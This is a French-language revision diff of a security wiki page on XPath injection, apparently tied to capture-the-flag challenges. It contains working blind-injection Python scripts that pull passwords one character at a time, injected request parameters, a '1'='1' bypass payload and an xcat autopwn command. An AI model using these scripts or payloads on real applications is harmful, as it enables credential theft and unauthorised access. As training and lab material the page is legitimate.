Différences

Cette page vous donne les différences entre la révision choisie et la version actuelle de la page.

--- failles_web:xpath_injection [2014/07/01 14:02]
sorcha [string-length]
+++ failles_web:xpath_injection [2017/04/09 15:33] (Version actuelle)
@@ Ligne 5: / Ligne 5: @@
-Une authentification basée sur un fichier xml.
 ==== Le principe: ====
@@ Ligne 70: / Ligne 69: @@
 Le test login/password se fait sur ce genre de code:
 <code php>
-Error during search, invalid XPath syntax : //user/username[contains(., '' )')]
+Invalid XPath syntax : //user/username[contains(., '' )')]
 </code>
@@ Ligne 159: / Ligne 158: @@
 <file python xpath3.py>
 import requests
+page = "http:///?action=user&userid=2"
+cooki = {'che' : '1','spip_session' : ''}
 child_node_pos=0
@@ Ligne 165: / Ligne 169: @@
 for user in range(1,10):
-   print "user:"+str(user)
+        print "user:"+str(user)
-   passwd=""
+        passwd=""
-   for child_node_pos in (1,2):
+        for child_node_pos in (4,6):
-   print " - noeud:"+str(child_node_pos)
+                print " - noeud:"+str(child_node_pos)
-   for t in range(1,50):
+                for t in range(1,50):
-   if continuer:
+                        if continuer:
-      continuer=False
+                                continuer=False
-   for carac in charset:
+                                for carac in charset:
-   req=page+"+and+substring(//user["+str(user)+"]/child::node()  ["+str(child_node_pos)+"],"+str(t)+",1)=codepoints-to-string("+str(ord(carac))+")"
+                                        req=page+"+and+substring(//user["+str(user)+"]/child::node()["+str(child_node_pos)+"],"+str(t)+",1)=codepoints-to-string("+str(ord(carac))+")"
-   res = requests.get(req,cookies=cooki)
+                                        res = requests.get(req,cookies=cooki)
-   if "Bob" in res.text:
+                                        if "John" in res.text:
-      passwd+=carac
+                                                passwd+=carac
-      continuer=True
+                                                continuer=True
-      print passwd
+                                                print passwd
-      break
+                                                break
-   else:
+                        else:
-      print passwd
+                                print passwd
-      t=1
+                                t=1
-      continuer=True
+                                continuer=True
-      passwd+=":"
+                                passwd+=":"
-      break
+                                break
 </file>
 \\
@@ Ligne 291: / Ligne 294: @@
 codepoints-to-string(90,101,110,107) renverra 'Zenk'
 </code>
-Dans l'exemple du chall n°3, la requête renverra True si le node d'index 4 du user d'index 2 commence par carac:
+La requête renverra True si le node d'index 4 du user d'index 2 commence par carac:
 <code python>
 req=page+"+and+substring(//user[2]/child::node()[4],1,1)=codepoints-to-string(string(ord(carac)))
@@ Ligne 312: / Ligne 315: @@
 #!/usr/bin/python
 import requests
 page =
 cooki = {}
 charset = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
 passwd=""
 req=page+"')][('1'='1"
 res = requests.get(req,cookies=cooki)
 for x in res.text.split("<li>"):print x
 continuer=True
 for t in range(0,50):
-if continuer:
+	if continuer:
-continuer=False
+		continuer=False
-for carac in charset:
+		for carac in charset:
-req=page+"Alice') and starts-with(../password,'"+passwd+carac
+			req=page+"Alice') and starts-with(../password,'"+passwd+carac
-#print req
+			#print req
-res = requests.get(req,cookies=cooki)
+			res = requests.get(req,cookies=cooki)
-#print " rep= "+res.text.split("value=")[3]+"\n-----------\n"
+			#print " rep= "+res.text.split("value=")[3]+"\n-----------\n"
-if "1 result" in res.text:
+			if "1 résultat trouvé" in res.text:
-passwd+=carac
+				passwd+=carac
-continuer=True
+				continuer=True
-print passwd
+				print passwd
-break
+				break
-else:
+	else:
-print "Le mot de passe est : "+passwd
+		print "Le mot de passe est : "+passwd
-break
+		break
 </file>
@@ Ligne 349: / Ligne 351: @@
 La requête RAW:
 <code python>
-GET HTTP/1.1
+GET //url.com/log=members&search=Harry')+and+starts-with(../password,' HTTP/1.1
 Host:
 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0
@@ Ligne 387: / Ligne 389: @@
 à tester:
 <code python>
-xcat.py --true "John" --arg "action=user&userid=2" --method GET --cookie "" http://challenge01.root-me.org//web-serveur/ch24/? --autopwn
+xcat.py --true "Alice" --arg "do=user&id_user=2" --method GET --cookie "" http://url.com/? --autopwn
 </code>
@@ Ligne 394: / Ligne 396: @@
 Le meilleur pour la fin, l'excellent outil de Krach:
-[[http://krach.in/category/outils/page/4/]]
+[[http://krach.me/XPath_Injection_Utility/]]
 \\
 ==== xpath-blind-explorer====
 [[http://code.google.com/p/xpath-blind-explorer/downloads/list?]]
-===== Docs =====
 ----
-* [[http://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf]]
-* [[http://2stop.me/Sécurité%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf]]
+===== Docs =====
-* [[http://packetstorm.interhost.co.il/papers/bypass/Blind_XPath_Injection_20040518.pdf]]
+  * [[http://media.blackhat.com/bh-eu-12/Siddharth/bh-eu-12-Siddharth-Xpath-WP.pdf]]
+  * [[http://2stop.me/Sécurité%20Informatique/Web/EN%20-%20Blind%20Xpath%20injection.pdf]]
+  * [[http://packetstorm.interhost.co.il/papers/bypass/Blind_XPath_Injection_20040518.pdf]]

Zenk - Security

Outils d'utilisateurs

Outils du Site

Différences

Outils de la Page